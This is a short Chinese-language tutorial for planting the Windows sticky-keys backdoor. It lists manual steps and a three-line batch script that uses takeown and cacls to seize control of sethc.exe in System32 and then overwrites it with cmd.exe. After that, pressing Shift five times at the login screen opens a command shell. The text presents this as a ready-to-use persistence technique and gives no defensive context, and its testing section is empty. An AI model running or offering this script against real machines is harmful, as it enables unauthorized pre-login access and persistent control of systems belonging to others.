(windows图形化界)粘滞键后门
思路:windows图形化界面未登入用户时,连按5次Shift键粘滞键的程序依然可以弹出,若若把粘滞键的程序改为其他程序则有不一样的效果(如cmd程序)。
一、手动直接修改文件名
①在windows 中C:\Windows\System32下找到sethc.exe(辅助功能快捷键),发现无法直接修改文件名且提示《您需要TrustedInstaller提供的权限才能对此文件进行更改》,没有权限,权限属于另一个用户组。
②在管理员权限下修改sethc.exe的所有者
③设置权限
④将sethc.exe文件删除或者修改文件都可。对cmd.exe程序执行上述②③相同步骤,将其命名为sethc.exe。即可实现粘滞键后门。
⑤注销测试
- Bat
takeown命令用于修改文件或目录所有者,/F参数用于指定文件或目录,/A参数指替换管理员组为所有者/E参数指编辑ACL而不替换,/G参数指赋予指定用户的权限。
takeown /F C:\Windows\System32\sethc.exe /A //将system32目录下的所有文件都修改所有者为本地管理员组
cacls C:\Windows\System32\sethc.exe /E /G administrator:F //将system32目录下的所有文件的访问控制列表都为管理员组的用户添加完全控制的权限,用于删除文件、重命名。
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe //删除sethc.exe将cmd.exe的文件名改为sethc.exe
bat脚本如下:
```
takeown /F C:\Windows\System32\sethc.exe /A
cacls C:\Windows\System32\sethc.exe /E /G administrator:F
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
```测试:
注销测试:
